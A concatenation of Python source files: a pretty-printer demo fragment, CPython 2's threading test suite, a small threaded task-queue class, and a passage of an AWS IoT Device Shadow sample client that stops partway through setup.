t.daemon = True
t.start()
return t
def stop_progress(self, loading_thread):
loading_thread.load = False
loading_thread.join()
if __name__ == '__main__':
# PrettyPrinter Init
p = PrettyPrinter()
# Contextual Function Demo
p.print_title("Contextual Pretty Print Functions Demo")
p.print_good("This is Good")
p.print_bad("This is Bad")
p.print_info("This is an Information")
p.print_question("Is this a Question ?")
p.print_separator(length=100,separator="~")
# Simple Loading Progress Bar Example
p.print_title("Simple Loading Progress Bar Demo")
t = p.start_progress(task="Loading templates ...")
time.sleep(6)
p.stop_progress(t)
p.print_separator(length=100,separator="~")
# Threaded Loading Examples (enable_dots set to False for better output)
p.print_title("Threaded Loading Demo")
t1 = threading.Thread(target=threadedExample, args=("thread1.com", 3))
t2 = threading.Thread(target=threadedExample, args=("thread2.com", 5))
t1.start()
t2.start()
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
core.py | import time
from Engine.EngineTest.engineTest import EngineTest
import threading, queue
import time
class Core:
"""Class Core that manages task affectation to pluggin-engines
"""
def __init__(self):
self.task_queue = queue.Queue()
threading.Thread(target=self.pooling, daemon=True).start()
def add_new_Task(self, function, args= None, kwargs = {}, startCallback=lambda x: None, callback=lambda x: None, endCallback=lambda x: None):
self.task_queue.put((function, args, kwargs, startCallback, callback, endCallback))
def pooling(self):
while True:
time.sleep(0.250)
function, args, kwargs, startCallback, callback, endCallback = self.task_queue.get()
startCallback(args)
result = function(*args, **kwargs)
endCallback(result)
|
shadow.py | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
import argparse
from awscrt import auth, io, mqtt, http
from awsiot import iotshadow
from awsiot import mqtt_connection_builder
from concurrent.futures import Future
import sys
import threading
import traceback
from uuid import uuid4
# - Overview -
# This sample uses the AWS IoT Device Shadow Service to keep a property in
# sync between device and server. Imagine a light whose color may be changed
# through an app, or set by a local user.
#
# - Instructions -
# Once connected, type a value in the terminal and press Enter to update
# the property's "reported" value. The sample also responds when the "desired"
# value changes on the server. To observe this, edit the Shadow document in
# the AWS Console and set a new "desired" value.
#
# - Detail -
# On startup, the sample requests the shadow document to learn the property's
# initial state. The sample also subscribes to "delta" events from the server,
# which are sent when a property's "desired" value differs from its "reported"
# value. When the sample learns of a new desired value, that value is changed
# on the device and an update is sent to the server with the new "reported"
# value.
parser = argparse.ArgumentParser(description="Device Shadow sample keeps a property in sync across client and server")
parser.add_argument('--endpoint', required=True, help="Your AWS IoT custom endpoint, not including a port. " +
"Ex: \"w6zbse3vjd5b4p-ats.iot.us-west-2.amazonaws.com\"")
parser.add_argument('--cert', help="File path to your client certificate, in PEM format")
parser.add_argument('--key', help="File path to your private key file, in PEM format")
parser.add_argument('--root-ca', help="File path to root certificate authority, in PEM format. " +
"Necessary if MQTT server uses a certificate that's not already in " +
"your trust store")
parser.add_argument('--client-id', default="test-" + str(uuid4()), help="Client ID for MQTT connection.")
parser.add_argument('--thing-name', required=True, help="The name assigned to your IoT Thing")
parser.add_argument('--shadow-property', default="color", help="Name of property in shadow to keep in sync")
parser.add_argument('--use-websocket', default=False, action='store_true',
help="To use a websocket instead of raw mqtt. If you " +
"specify this option you must specify a region for signing.")
parser.add_argument('--signing-region', default='us-east-1', help="If you specify --use-web-socket, this " +
"is the region that will be used for computing the Sigv4 signature")
parser.add_argument('--proxy-host', help="Hostname of proxy to connect to.")
parser.add_argument('--proxy-port', type=int, default=8080, help="Port of proxy to connect to.")
parser.add_argument('--verbosity', choices=[x.name for x in io.LogLevel], default=io.LogLevel.NoLogs.name,
help='Logging level')
# Using globals to simplify sample code
is_sample_done = threading.Event()
mqtt_connection = None
shadow_client = None
thing_name = ""
shadow_property = ""
SHADOW_VALUE_DEFAULT = "off"
class LockedData:
def __init__(self):
self.lock = threading.Lock()
self.shadow_value = None
self.disconnect_called = False
self.request_tokens = set()
locked_data = LockedData()
# Function for gracefully quitting this sample
def exit(msg_or_exception):
if isinstance(msg_or_exception, Exception):
print("Exiting sample due to exception.")
traceback.print_exception(msg_or_exception.__class__, msg_or_exception, sys.exc_info()[2])
else:
print("Exiting sample:", msg_or_exception)
with locked_data.lock:
if not locked_data.disconnect_called:
print("Disconnecting...")
locked_data.disconnect_called = True
future = mqtt_connection.disconnect()
future.add_done_callback(on_disconnected)
def on_disconnected(disconnect_future):
# type: (Future) -> None
print("Disconnected.")
# Signal that sample is finished
is_sample_done.set()
def on_get_shadow_accepted(response):
# type: (iotshadow.GetShadowResponse) -> None
try:
with locked_data.lock:
# check that this is a response to a request from this session
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring get_shadow_accepted message due to unexpected token.")
return
print("Finished getting initial shadow state.")
if locked_data.shadow_value is not None:
print(" Ignoring initial query because a delta event has already been received.")
return
if response.state:
if response.state.delta:
value = response.state.delta.get(shadow_property)
if value:
print(" Shadow contains delta value '{}'.".format(value))
change_shadow_value(value)
return
if response.state.reported:
value = response.state.reported.get(shadow_property)
if value:
print(" Shadow contains reported value '{}'.".format(value))
set_local_value_due_to_initial_query(response.state.reported[shadow_property])
return
print(" Shadow document lacks '{}' property. Setting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
except Exception as e:
exit(e)
def on_get_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring get_shadow_rejected message due to unexpected token.")
return
if error.code == 404:
print("Thing has no shadow document. Creating with defaults...")
change_shadow_value(SHADOW_VALUE_DEFAULT)
else:
exit("Get request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def on_shadow_delta_updated(delta):
# type: (iotshadow.ShadowDeltaUpdatedEvent) -> None
try:
print("Received shadow delta event.")
if delta.state and (shadow_property in delta.state):
value = delta.state[shadow_property]
if value is None:
print(" Delta reports that '{}' was deleted. Resetting defaults...".format(shadow_property))
change_shadow_value(SHADOW_VALUE_DEFAULT)
return
else:
print(" Delta reports that desired value is '{}'. Changing local value...".format(value))
change_shadow_value(value)
else:
print(" Delta did not report a change in '{}'".format(shadow_property))
except Exception as e:
exit(e)
def on_publish_update_shadow(future):
#type: (Future) -> None
try:
future.result()
print("Update request published.")
except Exception as e:
print("Failed to publish update request.")
exit(e)
def on_update_shadow_accepted(response):
# type: (iotshadow.UpdateShadowResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(response.client_token)
except KeyError:
print("Ignoring update_shadow_accepted message due to unexpected token.")
return
try:
print("Finished updating reported shadow value to '{}'.".format(response.state.reported[shadow_property])) # type: ignore
print("Enter desired value: ") # remind user they can input new values
except:
exit("Updated shadow is missing the target property.")
except Exception as e:
exit(e)
def on_update_shadow_rejected(error):
# type: (iotshadow.ErrorResponse) -> None
try:
# check that this is a response to a request from this session
with locked_data.lock:
try:
locked_data.request_tokens.remove(error.client_token)
except KeyError:
print("Ignoring update_shadow_rejected message due to unexpected token.")
return
exit("Update request was rejected. code:{} message:'{}'".format(
error.code, error.message))
except Exception as e:
exit(e)
def set_local_value_due_to_initial_query(reported_value):
with locked_data.lock:
locked_data.shadow_value = reported_value
print("Enter desired value: ") # remind user they can input new values
def change_shadow_value(value):
with locked_data.lock:
if locked_data.shadow_value == value:
print("Local value is already '{}'.".format(value))
print("Enter desired value: ") # remind user they can input new values
return
print("Changed local shadow value to '{}'.".format(value))
locked_data.shadow_value = value
print("Updating reported shadow value to '{}'...".format(value))
# use a unique token so we can correlate this "request" message to
# any "response" messages received on the /accepted and /rejected topics
token = str(uuid4())
request = iotshadow.UpdateShadowRequest(
thing_name=thing_name,
state=iotshadow.ShadowState(
reported={ shadow_property: value },
desired={ shadow_property: value },
),
client_token=token,
)
future = shadow_client.publish_update_shadow(request, mqtt.QoS.AT_LEAST_ONCE)
locked_data.request_tokens.add(token)
future.add_done_callback(on_publish_update_shadow)
def user_input_thread_fn():
while True:
try:
# Read user input
new_value = input()
# If user wants to quit sample, then quit.
# Otherwise change the shadow value.
if new_value in ['exit', 'quit']:
exit("User has quit")
break
else:
change_shadow_value(new_value)
except Exception as e:
print("Exception on input thread.")
exit(e)
break
if __name__ == '__main__':
# Process input args
args = parser.parse_args()
thing_name = args.thing_name
shadow_property = args.shadow_property
io.init_logging(getattr(io.LogLevel, args.verbosity), 'stderr')
# Spin up resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
proxy_options = None
if (args.proxy_host):
proxy_options = http.HttpProxyOptions(host_name=args.proxy_host, port=args.proxy_port)
if args.use_websocket == True:
credentials_provider = auth.AwsCredentialsProvider.new_default_chain(client_bootstrap)
mqtt_connection = mqtt_connection_builder.websockets_with_default_aws_signing(
endpoint=args.endpoint,
client_bootstrap=client_bootstrap,
region=args.signing_region,
credentials_provider=credentials_provider,
http_proxy_options=proxy_options,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=30)
else:
mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=args.endpoint,
cert_filepath=args.cert,
pri_key_filepath=args.key,
client_bootstrap=client_bootstrap,
ca_filepath=args.root_ca,
client_id=args.client_id,
clean_session=True,
keep_alive_secs=30,
http_proxy_options=proxy_options)
print("Connecting to {} with client ID '{}'...".format(
args.endpoint, args.client_id))
connected_future = mqtt_connection.connect()
shadow_client = iotshadow.IotShadowClient(mqtt_connection)
# Wait for connection to be fully established.
# Note that it's not necessary to wait, commands issued to the
# mqtt_connection before its fully connected will simply be queued.
# But this sample waits here so it's obvious when a connection
# fails or succeeds.
connected_future.result()
print("Connected!")
try:
# Subscribe to necessary topics.
# Note that is **is** important to wait for "accepted/rejected" subscriptions
# to succeed before publishing the corresponding "request".
print("Subscribing to Update responses...")
update_accepted_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_accepted(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_accepted)
update_rejected_subscribed_future, _ = shadow_client.subscribe_to_update_shadow_rejected(
request=iotshadow.UpdateShadowSubscriptionRequest(thing_name=args.thing_name),
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_update_shadow_rejected)
# Wait for subscriptions to succeed
update_accepted_subscribed_future.result()
update_rejected_subscribed_future.result()
print("Subscribing to Get responses...")
